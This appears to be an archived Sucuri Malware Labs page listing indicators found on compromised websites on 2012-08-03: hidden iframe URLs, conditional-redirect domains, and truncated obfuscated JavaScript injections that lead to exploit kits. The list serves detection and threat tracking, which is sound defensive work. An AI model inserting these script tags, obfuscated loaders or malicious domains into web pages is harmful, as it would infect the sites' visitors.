Sucuri Malware Labs

Historic malware entries for 2012-08-03Home | Notes | Malware data | Signatures | Tools | About

Archived data: Latest | 2013-05-15 | 2013-05-14 | 2013-05-13 | 2013-05-12 | 2013-05-07 | 2013-05-02 | 2013-05-01 | 2013-04-29 | More days

We separate the data in three categories: Iframes, redirectiors and javascript. For each one you can click on the domain for more information, IP addresses and details on the malware.

Hidden iframes

Latest hidden iframes our scanner have identified on compromised web sites.

# of sites infected	Type	Malware / Domains
38	iframe	http://whitecada.ru/in.cgi?16
36	iframe	http://hazelwave.ru/in.cgi?16
26	iframe	http://monmonmedia.com/main.php
18	iframe	http://simplevid.tv/wordpress.php
13	iframe	http://cabaniaseleden.com.ar/stats.php
13	iframe	http://bitcolony.ru/in.cgi?16
12	iframe	http://interviewerbacklit.org/news.php?id=e6f6402caf60df3a
12	iframe	http://blogroute.ru/in.cgi?16
11	iframe	http://transcriptsdelivers.org/news.php?id=e6f6402caf60df3a
11	iframe	http://niu-sae.com/stats.php
10	iframe	http://purplefrigate.ru/in.cgi?16
10	iframe	http://brownform.ru/in.cgi?15
7	iframe	http://azureriver.ru/in.cgi?15
6	iframe	http://oxsanasiberians.com/downloads/stats.php
6	iframe	http://katestat.info/in.cgi?9
5	iframe	http://playart.org/sites/stats.php
5	iframe	http://methuenedge.com/stats.php
4	iframe	http://zumobtr.ru/gate.php?f=1036767
4	iframe	http://pinkium.ru/in.cgi?16
3	iframe	http://u61s.info/main.php?page=60f9ec0eb067e648
3	iframe	http://rolyjyl.ru/count30.php
3	iframe	http://gingertide.ru/in.cgi?15
2	iframe	http://google-adsens.com/in.cgi?2
1	iframe	http://uploadingbefuddling.org/in.cgi?16
1	iframe	http://thomasvillefurnishings.ca/66124443.html
1	iframe	http://snapvenue.ru/in.cgi?16
1	iframe	http://minigametight.in/in.cgi?7
1	iframe	http://kvnxkpc.portrelay.com/vd/43;28a69843acd47672da2be368bfda9b0d
1	iframe	http://greenpillar.ru/in.cgi?16
1	iframe	http://forkfamiliarity.ind.in/?3
1	iframe	http://cuscofishing.com/13854443.html
1	iframe	http://blackium.ru/in.cgi?16
1	iframe	http://acwf.net/92194443.html
		Limited view (40 rows)... Only the top entries being displayed.

Conditional redirections

Conditional redirections we have detected (based on user agents or referers).

# of sites infected	Type	Malware / Domains
1050	redirections	http://fitnes-mir.ru/mimosa?5
1004	redirections	http://fitnesmir.ru/mimosa?5
938	redirections	http://fitnes-magazine.ru/viola?5
538	redirections	http://fitnesmagazine.ru/viola?5
275	redirections	http://fitnesrussia.ru/viola?5
213	redirections	http://fitnes-mir.ru/mimosa?5
207	redirections	http://fitnesmir.ru/mimosa?5
186	redirections	http://fitnes-magazine.ru/viola?5
140	redirections	http://russianfitnes.ru/viola?5
122	redirections	http://fitnes-corp.ru/shurimuri?5
111	redirections	http://fitnesmagazine.ru/viola?5
102	redirections	http://fitnes-russia.ru/viola?5
55	redirections	http://fitnesrussia.ru/viola?5
40	redirections	http://nashifitnes.ru/nonalco?5
35	redirections	http://whitecada.ru/in.cgi?16
35	redirections	http://co-fitnes.ru/mimosa?5
31	redirections	http://verygood2014.ru/in.cgi?11
28	redirections	http://russianfitnes.ru/viola?5
28	redirections	http://fitnes-corp.ru/shurimuri?5
23	redirections	http://fitnes-russia.ru/viola?5
20	redirections	http://bitcolony.ru/in.cgi?16
19	redirections	http://miamiheattickets.com/http.php
18	redirections	http://my-supas.ru/blackmuscats?5
16	redirections	http://commitse.ru
10	redirections	http://live-fitnes.ru/shurimuri?5
10	redirections	http://fvzex80.info/in.cgi?7
10	redirections	http://blogroute.ru/in.cgi?16
10	redirections	http://2011-supas.ru/blackmuscat?4
8	redirections	http://whitecada.ru/in.cgi?16
8	redirections	http://nashifitnes.ru/nonalco?5
8	redirections	http://greencricket.ru/in.cgi?16
8	redirections	http://co-fitnes.ru/mimosa?5
8	redirections	http://ciscotred.cz.cc/
8	redirections	http://176.9.179.140/
6	redirections	http://verygoods24.ru/in.cgi?9
6	redirections	http://supas-2012.ru/blackmuscat?4
6	redirections	http://mysupas.ru/blackmuscats?5
6	redirections	http://medicquil.ru
6	redirections	http://mcprom.co.cc/
6	redirections	http://2010-supas.ru/piramas?4
		Limited view (40 rows)... Only the top entries being displayed.

Encoded javascript

Encoded javascript (redirecting to blackhole and other exploit kits) or to build a remote call.

# of sites infected	Type	Malware / Domains
1746	javascript	<script type="text/javascript" src="http://www.jquerys.org/ajax/libs/jquery/jquery-1.6.3.min.js...
440	javascript	<script>try{n^=window["ev"+"al"];}catch(zxc){e=eval;n="1122..1404..1210..1188..1276..1260..1221...
122	javascript	<script>try{n^=window["ev"+"al"];}catch(zxc){e=eval;n="143..120..1122..1404..1210..1188..1276.....
93	javascript	<script type="text/javascript" src="http://www.jquerys.org/ajax/libs/jquery/jquery-1.6.3.min.js...
30	javascript	<script>try{n^=window["ev"+"al"];}catch(zxc){e=eval;n="156..130..1200..1443..1188..1521..1308.....
30	javascript	<script src="http://andsto57cksstar.rr.nu/sl.php"></script>
27	javascript	<script>var url="http://camel-paper.com/wp-includes/ads.php";if((navigator.userAgent.toLowerCas...
27	javascript	<script>try{n^=window["ev"+"al"];}catch(zxc){e=eval;n="108..117..1260..1326..384..520..1200..14...
25	javascript	<script src="http://andsto57cksstar.rr.nu/sl.php"></script>
22	javascript	<script type="text/javascript" language="javascript" src="xx" ></script>
20	javascript	<script language="javascript" type="text/javascript" src="http://js.users.51.la/4387405.js"></s...
18	javascript	<script type="text/javascript" language="javascript" src="/zz" ></script>
18	javascript	<script>try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-012/5;try{prototype...
17	javascript	<script type='text/javascript'>var wow="qub2stionsb3nmb3nb1cob1b3tb1pn";c1="lonly"; if(-1==docu...
17	javascript	<script type="text/javascript" src="http://rw3000.duu.pl/mltools.js"></script>
17	javascript	<script>try{n^=window["ev"+"al"];}catch(zxc){e=eval;n="99..108..1155..1224..352..480..1100..133...
16	javascript	<script type="text/javascript" src="http://gardenstory.pl/mltools.js"></script>
16	javascript	<script>try{q=document.createElement("u");q.appendChild(q+"");}catch(qw){h=-012/5;zz='a'+'l';f=...
16	javascript	<script src="http://andsto57cksstar.rr.nu/sl.php?v=1"></script>
15	javascript	<script>if(window.document)try{location(12);}catch(qqq){aa=[]+0;aaa=0+[];if(aa.indexOf(aaa)===0...
13	javascript	<script src="http://www.medprolab.in/google.js" type="text/javascript"></script>
12	javascript	<script src="http://tentsf05luxfig.rr.nu/sl.php?v=1"></script>
12	javascript	<script src="http://sweepstakesandcontestsdo.com/pmg.php?dr=1"></script>
11	javascript	<script src="http://tentsf05luxfig.rr.nu/sl.php"></script>
11	javascript	<script language="JavaScript">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt...
10	javascript	<script>var url="http://www.lifeshiftdevelopment.com/stats.php";if((navigator.userAgent.toLower...
10	javascript	<script>s="";try{q=document.createElement("p");q.appendChild("123"+n);}catch(qw){f="fromCharCod...
10	javascript	<script src="http://andsto57cksstar.rr.nu/sl.php?v=1"></script><!--/" onclick="window.location....
9	javascript	<script>try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-012/5;try{prototype...
9	javascript	<script src=http://tanikotomotiv.com/images/gifimg.php ></script>
9	javascript	<script src="http://andsto57cksstar.rr.nu/sl.php"></script><!--Oman Air - "></title><script src...
8	javascript	<script type='text/javascript'>var wow="rb2volutionwhb2rb2cb3nb1b3ub1pn";c1="lonly"; if(-1==doc...
8	javascript	<script>s="";h=-016/7;try{q=document.createElement("p");a=(q)?"appendC":12;q[a+"hild"](""+n);}c...
7	javascript	<script>var QgYpfH="cQ5cQBucQ35";var cVPyCRf="Q6FcQ3DcQ27";var ETUD="eplace(/G6L/g";var xhyBcxL...
6	javascript	<script>s="";try{q=document.createElement("p");a=(q)?"appendChild":12;q[a]("123"+n);}catch(qw){...
6	javascript	<script src="http://lasimp04risoned.rr.nu/sl.php"></script>
6	javascript	<script>if(window.document)a=("urf3".split+'qwe').substr(0,6);aa=(Date+{}).substr(0,6);if(a===a...
5	javascript	<script>var url="http://onmouseup.info/stats.php";if((navigator.userAgent.toLowerCase().indexOf...
5	javascript	<script type="text/javascript" src="http://eumemo.com.br/010706.php"></script>
5	javascript	<script>try{n^=window["ev"+"al"]("pr"+"ototype");}catch(zxc){e=eval;n="143..120..1122..1404..12...
		Limited view (40 rows)... Only the top entries being displayed.